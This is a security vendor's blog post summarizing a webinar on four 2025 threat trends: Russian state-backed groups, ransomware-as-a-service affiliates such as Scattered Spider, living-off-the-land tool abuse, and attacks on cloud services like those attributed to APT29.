Four Cybersecurity Challenges to Focus On Right Now

• Principal Intelligence Analyst Dick O’Brien hosted a recent webinar to dissect the top potential challenges facing organizations in 2025.
• Topping the list are nation-state actors, LotL attacks, faltering cloud security and more.
• These findings were drawn from the latest intel from the The Symantec & Carbon Black Threat Hunter Team. 

In an era when tactics continually evolve, harnessing the latest threat intelligence is key. That’s exactly what our Principal Intelligence Analyst, Dick O’Brien brought to the table in “Beyond the Horizon: Cybersecurity Challenges in 2025.” In this data-packed webinar Dick revealed four cybersecurity challenges organizations can expect to encounter in 2025, backed by fresh intel straight from the Symantec & Carbon Black Threat Hunter Team.

Here are our four key observations to have on your radar right now—insights you don’t want to miss.

Increased Russian aggression in cyberspace

Russian nation-state cyberattacks pose a risk as conditions increasingly resemble those during their 2016 spike in activity—a period of political instability, divisive election campaigns and economic uncertainty, where public levels of suspicion and paranoia were already high. Today, recent incidents like the cutting of undersea cables in the Baltic Sea suggest that Russia is may be escalating its tactics once again.

As the state of the world today echoes that of 2016, two prominent Russian groups exemplify the threat: Sandworm and Dragonfly. Sandworm—the notorious group responsible for blacking out Ukraine’s power grid in 2015, 2016 and 2022—has demonstrated a consistent capability to mount destructive attacks

Uncovered by us about a decade ago, Dragonfly is capable of deep penetration on energy sector networks, using spear phishing, custom Trojans, and lateral movement across both administrative and industrial control system (ICS) networks. 

Shifting ransomware dynamics

Since around 2020, the rise of ransomware-as-a-service (RaaS) has allowed attackers to scale their nefarious operations and multiply their revenue. RaaS operators now compete for affiliates, which means if law enforcement shuts down one group, affiliates can quickly join a new operator—minimizing downtime for advanced attacks.

Scattered Spider is a notable example of a “super affiliate,” responsible for recent high-profile attacks on Caesars Entertainment and MGM Resorts. As English speakers with a strong understanding of enterprise systems, their social engineering attacks on help desk staff were dangerously successful, earning them password changes and multi-factor authentication (MFA) bypass. Scattered Spider shifted between groups like Noberus, RansomHub and Qilin before a few members were arrested—but there are plenty of equally dangerous affiliates still out there.

Upsurge in Living-off-the-Land (LotL) attacks

The vast majority of tools ransomware attackers use to breach a network and move laterally are legitimate ones and often tools businesses need for their daily operations. Malware isn’t even needed in some cases, and hiding under the cover a familiar tool means it takes longer before the alarms are raised. While this isn’t a new tactic, the rate of LotL attacks is increasing at an alarming rate.

Some of the more frequently used tools include those native to the OS or signed by the developer, PowerShell, PsExec and WMI, Schtasks, BITSAdmin and Vssadmin. But more and more tools are being added to the mix, with attackers adapting their techniques to evade rising defenses.

Attacks against the cloud

The honeymoon for cloud service security is coming to an end. It’s certainly a lot harder to breach a cloud service than an organization’s network, but the perception that they’re inherently secure is challenged by recent breaches—particularly by espionage-motivated attackers. One such actor serves as a picture of what organizations should look out for in the cloud. 

Fritillary (aka Midnight Blizzard or APT29) may use a lot of the same tools, tactics and procedures (TTPs) that their peers use, but they’re also innovative. The Russian nation-state group’s recent demonstration of their ability to breach Microsoft 365 accounts (including those of senior executives) shows just what they’re capable of—and what other groups who follow in their footsteps could do in this focal shift to cloud services. 

Get the full picture

For the entire deep dive into this analysis, and insight into what you need on your radar, watch the on-demand webinar.